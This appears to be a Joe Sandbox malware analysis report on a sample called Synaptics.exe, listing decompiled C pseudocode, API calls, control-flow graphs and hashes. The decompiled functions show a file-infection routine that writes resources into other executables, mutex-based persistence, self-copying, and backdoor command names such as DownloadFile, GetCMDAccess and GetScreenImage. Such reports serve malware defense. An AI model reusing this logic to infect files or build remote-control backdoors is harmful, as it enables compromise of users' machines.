                                                                                                                                                                                                                            0x0043e7c6
                                                                                                                                                                                                                            0x0043e7cd
                                                                                                                                                                                                                            0x0043e7db
                                                                                                                                                                                                                            0x0043e7dd
                                                                                                                                                                                                                            0x0043e7ea
                                                                                                                                                                                                                            0x0043e7ec
                                                                                                                                                                                                                            0x0043e7ec
                                                                                                                                                                                                                            0x0043e804
                                                                                                                                                                                                                            0x0043e822
                                                                                                                                                                                                                            0x0043e822
                                                                                                                                                                                                                            0x0043e82a
                                                                                                                                                                                                                            0x0043e831
                                                                                                                                                                                                                            0x0043e836
                                                                                                                                                                                                                            0x0043e84e
                                                                                                                                                                                                                            0x0043e853
                                                                                                                                                                                                                            0x0043e857
                                                                                                                                                                                                                            0x0043e85f
                                                                                                                                                                                                                            0x0043e85f
                                                                                                                                                                                                                            0x0043e866
                                                                                                                                                                                                                            0x0043e869
                                                                                                                                                                                                                            0x0043e86c
                                                                                                                                                                                                                            0x0043e87c
                                                                                                                                                                                                                            0x0043e6fe
                                                                                                                                                                                                                            0x0043e6fe
                                                                                                                                                                                                                            0x0043e703
                                                                                                                                                                                                                            0x0043e728
                                                                                                                                                                                                                            0x0043e72b
                                                                                                                                                                                                                            0x0043e731
                                                                                                                                                                                                                            0x0043e747
                                                                                                                                                                                                                            0x0043e74c
                                                                                                                                                                                                                            0x0043e751
                                                                                                                                                                                                                            0x0043e75e
                                                                                                                                                                                                                            0x0043e763
                                                                                                                                                                                                                            0x0043e70b
                                                                                                                                                                                                                            0x0043e70d
                                                                                                                                                                                                                            0x0043e71a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043e723
                                                                                                                                                                                                                            0x0043e723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043e703

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                                                                                                            • String ID: 0/B$@$tC
                                                                                                                                                                                                                            • API String ID: 717780171-775952512
                                                                                                                                                                                                                            • Opcode ID: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                                                            • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 418 402d70-402d84 419 402d91-402da7 418->419 420 402d86-402d87 418->420 423 402dd0-402de2 419->423 421 402da9-402db8 420->421 422 402d89-402d8a 420->422 426 402dc9 421->426 424 402dba-402dc4 422->424 425 402d8c 422->425 427 402de8-402e00 CreateFileA 423->427 428 402e9a-402eb7 423->428 424->426 429 402ef8-402ef9 425->429 426->423 432 402e06-402e0e 427->432 433 402f0e-402f19 GetLastError 427->433 430 402eb9-402ebb 428->430 431 402ebd-402ec3 428->431 434 402ecb-402ed3 GetStdHandle 430->434 435 402ec5-402ec7 431->435 436 402ec9 431->436 437 402e14-402e22 GetFileSize 432->437 438 402ed7-402edd 432->438 433->429 434->433 440 402ed5 434->440 435->434 436->434 437->433 439 402e28-402e2d 437->439 441 402ef6 438->441 442 402edf-402ee8 GetFileType 438->442 443 402e31-402e3e SetFilePointer 439->443 444 402e2f 439->444 440->438 441->429 445 402efa-402f0c CloseHandle 442->445 446 402eea-402eed 442->446 443->433 447 402e44-402e60 ReadFile 443->447 444->443 445->429 446->441 448 402eef 446->448 447->433 449 402e66 447->449 448->441 450 402e68-402e6a 449->450 450->438 451 402e6c-402e74 450->451 452 402e76-402e77 451->452 453 402e79-402e88 SetFilePointer 451->453 452->450 453->433 454 402e8e-402e96 SetEndOfFile 453->454 454->433 455 402e98 454->455 455->438
                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0); // executed
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                                                                                                                                            0x00402d71
                                                                                                                                                                                                                            0x00402d75
                                                                                                                                                                                                                            0x00402d78
                                                                                                                                                                                                                            0x00402d84
                                                                                                                                                                                                                            0x00402d91
                                                                                                                                                                                                                            0x00402d96
                                                                                                                                                                                                                            0x00402d9b
                                                                                                                                                                                                                            0x00402da0
                                                                                                                                                                                                                            0x00402d86
                                                                                                                                                                                                                            0x00402d87
                                                                                                                                                                                                                            0x00402da9
                                                                                                                                                                                                                            0x00402dae
                                                                                                                                                                                                                            0x00402db3
                                                                                                                                                                                                                            0x00402d89
                                                                                                                                                                                                                            0x00402d8a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402dba
                                                                                                                                                                                                                            0x00402dbf
                                                                                                                                                                                                                            0x00402dc4
                                                                                                                                                                                                                            0x00402dc4
                                                                                                                                                                                                                            0x00402dc9
                                                                                                                                                                                                                            0x00402dc9
                                                                                                                                                                                                                            0x00402dd0
                                                                                                                                                                                                                            0x00402dd7
                                                                                                                                                                                                                            0x00402de2
                                                                                                                                                                                                                            0x00402ea0
                                                                                                                                                                                                                            0x00402ea7
                                                                                                                                                                                                                            0x00402eae
                                                                                                                                                                                                                            0x00402eb7
                                                                                                                                                                                                                            0x00402ec3
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ec5
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402eb9
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ed3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ed5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402de8
                                                                                                                                                                                                                            0x00402df8
                                                                                                                                                                                                                            0x00402e00
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f14
                                                                                                                                                                                                                            0x00402e06
                                                                                                                                                                                                                            0x00402e0e
                                                                                                                                                                                                                            0x00402ed7
                                                                                                                                                                                                                            0x00402edd
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00402ee1
                                                                                                                                                                                                                            0x00402ee8
                                                                                                                                                                                                                            0x00402efc
                                                                                                                                                                                                                            0x00402f01
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f07
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402e14
                                                                                                                                                                                                                            0x00402e21
                                                                                                                                                                                                                            0x00402e22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e28
                                                                                                                                                                                                                            0x00402e2d
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e44
                                                                                                                                                                                                                            0x00402e59
                                                                                                                                                                                                                            0x00402e5e
                                                                                                                                                                                                                            0x00402e60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e66
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e74
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e3e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                                                                                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1694776339-0
                                                                                                                                                                                                                            • Opcode ID: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
                                                                                                                                                                                                                            • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473930 Relevance: 15.1, APIs: 10, Instructions: 108fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00473930(CHAR* __eax, CHAR* __edx) {
				void _v40;
				void* _v44;
				long _v48;
				char _v52;
				CHAR* _v56;
				void* _t23;
				void* _t49;
				long _t60;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_v56 = __edx;
				_v52 = 0;
				_t23 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t66 = _t23;
				if(_t66 > 0) {
					ReadFile(_t66,  &_v40, 0x16,  &_v48, 0); // executed
					SetFilePointer(_t66, 0, 0, 0); // executed
					_t65 = E0040275C(0x26);
					_t64 = E0040275C(0x22);
					_t59 = _t65;
					ReadFile(_t66, _t65, 0x26,  &_v48, 0); // executed
					E004029DC(_t59, 0x14, _t64);
					 *((intOrPtr*)(_t64 + 6)) =  *((intOrPtr*)(_t65 + 6));
					 *((intOrPtr*)(_t64 + 0xa)) =  *((intOrPtr*)(_t65 + 0xa));
					 *(_t64 + 0xe) =  *(_t65 + 0xe);
					 *((short*)(_t64 + 0x12)) = 1;
					_t60 =  *(_t65 + 0xe);
					_v44 = E0040275C(_t60);
					SetFilePointer(_t66,  *(_t65 + 0x12), 0, 0); // executed
					ReadFile(_t66, _v44, _t60,  &_v48, 0);
					CloseHandle(_t66); // executed
					_t49 = BeginUpdateResourceA(_v56, "true"); // executed
					_t67 = _t49;
					if(_t67 > 0) {
						UpdateResourceA(_t67, 3, 1, 0, _v44, _t60);
						EndUpdateResourceA(_t67, 0); // executed
						_v52 = 1;
					}
					E0040277C(_v44);
					E0040277C(_t64);
					E0040277C(_t65);
				}
				return _v52;
			}















                                                                                                                                                                                                                            0x00473937
                                                                                                                                                                                                                            0x0047393a
                                                                                                                                                                                                                            0x00473952
                                                                                                                                                                                                                            0x00473957
                                                                                                                                                                                                                            0x0047395b
                                                                                                                                                                                                                            0x00473970
                                                                                                                                                                                                                            0x0047397c
                                                                                                                                                                                                                            0x0047398b
                                                                                                                                                                                                                            0x00473997
                                                                                                                                                                                                                            0x004739a2
                                                                                                                                                                                                                            0x004739a6
                                                                                                                                                                                                                            0x004739b4
                                                                                                                                                                                                                            0x004739bc
                                                                                                                                                                                                                            0x004739c2
                                                                                                                                                                                                                            0x004739c8
                                                                                                                                                                                                                            0x004739cb
                                                                                                                                                                                                                            0x004739d1
                                                                                                                                                                                                                            0x004739db
                                                                                                                                                                                                                            0x004739e8
                                                                                                                                                                                                                            0x004739fb
                                                                                                                                                                                                                            0x00473a01
                                                                                                                                                                                                                            0x00473a0d
                                                                                                                                                                                                                            0x00473a12
                                                                                                                                                                                                                            0x00473a16
                                                                                                                                                                                                                            0x00473a25
                                                                                                                                                                                                                            0x00473a2d
                                                                                                                                                                                                                            0x00473a32
                                                                                                                                                                                                                            0x00473a32
                                                                                                                                                                                                                            0x00473a3b
                                                                                                                                                                                                                            0x00473a42
                                                                                                                                                                                                                            0x00473a49
                                                                                                                                                                                                                            0x00473a49
                                                                                                                                                                                                                            0x00473a59

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0049A0E3,00000000,0049A352), ref: 00473952
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000), ref: 00473970
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0047397C
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000), ref: 004739A6
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016), ref: 004739E8
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000), ref: 004739FB
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000), ref: 00473A01
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00473A0D
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00473A25
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00473A2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ReadResourceUpdate$Pointer$BeginCloseCreateHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2954177348-0
                                                                                                                                                                                                                            • Opcode ID: 2590ce1a74d2837bb9c478fe0ddba3c46b053e8e32707a9ec078a65d7c66f3c1
                                                                                                                                                                                                                            • Instruction ID: bc58bece930a9ee3c191066ba21d3152ea947465ec18ce8fe9039474e398f891
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2590ce1a74d2837bb9c478fe0ddba3c46b053e8e32707a9ec078a65d7c66f3c1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33147707443057EE210EB598C46F6BB7DC9F44704F00442EBA59EB2C2D6B9F904976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00495BD4 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 105threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID: CheckMe$DeleteFile$DownloadFile$GetCMDAccess$GetScreenImage$ListDir$ListDisk
                                                                                                                                                                                                                            • API String ID: 2422867632-2040281516
                                                                                                                                                                                                                            • Opcode ID: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                                                            • Instruction ID: cc4d067afddf7cdfb89c5fbb3b31213d9db14bacd25ac7606a572a3bc3506bde
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131CF30710A049BCF12EBA5DC46A1A7BB4EF89714B70867BF600D77A1CA3CAD09871C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                            			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(E0049A5F6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x4967bc
				_t97 = _t29;
				 *0x49f149 = E00477AD8(_t32, _t92, _t31, _t123, _t124);
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x4967a8, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124); // executed
						E00498F04(_t92, _t123, _t124); // executed
						if(E00498B40(_t92, _t92, _t123, _t124) == 0) {
							_t49 =  *0x49f1b0; // 0x21e335c
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x21e336c
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x21e337c
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x21e338c
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x21e339c
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x21e3338
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x21e3328
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98); // executed
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137); // executed
							E00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124);
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x4967a8
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x4967a8
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					E00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}






























                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e5
                                                                                                                                                                                                                            0x0049a3e6
                                                                                                                                                                                                                            0x0049a3e7
                                                                                                                                                                                                                            0x0049a3e8
                                                                                                                                                                                                                            0x0049a3e9
                                                                                                                                                                                                                            0x0049a3ea
                                                                                                                                                                                                                            0x0049a3eb
                                                                                                                                                                                                                            0x0049a3ef
                                                                                                                                                                                                                            0x0049a3f0
                                                                                                                                                                                                                            0x0049a3f5
                                                                                                                                                                                                                            0x0049a3f8
                                                                                                                                                                                                                            0x0049a3fd
                                                                                                                                                                                                                            0x0049a5ba
                                                                                                                                                                                                                            0x0049a5cb
                                                                                                                                                                                                                            0x0049a5cf
                                                                                                                                                                                                                            0x0049a5d4
                                                                                                                                                                                                                            0x0049a5d6
                                                                                                                                                                                                                            0x0049a5d9
                                                                                                                                                                                                                            0x0049a5dc
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a40a
                                                                                                                                                                                                                            0x0049a416
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a42c
                                                                                                                                                                                                                            0x0049a432
                                                                                                                                                                                                                            0x0049a435
                                                                                                                                                                                                                            0x0049a43e
                                                                                                                                                                                                                            0x0049a446
                                                                                                                                                                                                                            0x0049a44d
                                                                                                                                                                                                                            0x0049a452
                                                                                                                                                                                                                            0x0049a458
                                                                                                                                                                                                                            0x0049a465
                                                                                                                                                                                                                            0x0049a472
                                                                                                                                                                                                                            0x0049a477
                                                                                                                                                                                                                            0x0049a4fd
                                                                                                                                                                                                                            0x0049a4ff
